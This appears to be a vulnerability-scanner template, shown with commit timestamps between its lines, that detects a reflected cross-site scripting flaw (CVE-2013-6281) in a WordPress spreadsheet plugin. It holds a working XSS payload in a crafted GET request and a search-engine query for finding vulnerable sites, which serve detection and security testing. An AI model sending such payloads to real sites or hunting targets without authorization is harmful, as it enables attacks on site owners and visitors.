2022-05-19 18:27:03 +00:00
|
|
|
id: CVE-2013-6281
|
|
|
|
|
|
|
|
info:
|
2022-08-16 14:14:41 +00:00
|
|
|
name: WordPress Spreadsheet - Cross-Site Scripting
|
2022-05-19 18:27:03 +00:00
|
|
|
author: random-robbie
|
|
|
|
severity: medium
|
2022-05-19 18:34:24 +00:00
|
|
|
description: |
|
2022-08-16 14:14:41 +00:00
|
|
|
WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.
|
2022-05-19 18:27:03 +00:00
|
|
|
reference:
|
2022-05-19 18:34:24 +00:00
|
|
|
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
|
2022-06-07 20:50:59 +00:00
|
|
|
- http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
|
2022-05-19 18:34:24 +00:00
|
|
|
- https://wordpress.org/plugins/dhtmlxspreadsheet/
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
|
2022-08-16 14:14:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-6281
|
2022-05-19 18:27:03 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2013-6281
|
|
|
|
cwe-id: CWE-79
|
2022-05-19 18:34:24 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-09-08 22:39:14 +00:00
|
|
|
google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
|
2022-05-19 18:27:03 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-05-19 18:27:03 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
2022-05-19 18:34:24 +00:00
|
|
|
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
2022-05-19 18:27:03 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-05-19 18:34:24 +00:00
|
|
|
- "page: '<script>alert(document.domain)</script>'"
|
2022-05-19 18:27:03 +00:00
|
|
|
- "dhx_rel_path"
|
2022-05-19 18:34:24 +00:00
|
|
|
condition: and
|
2022-05-19 18:27:03 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-16 14:14:41 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/12
|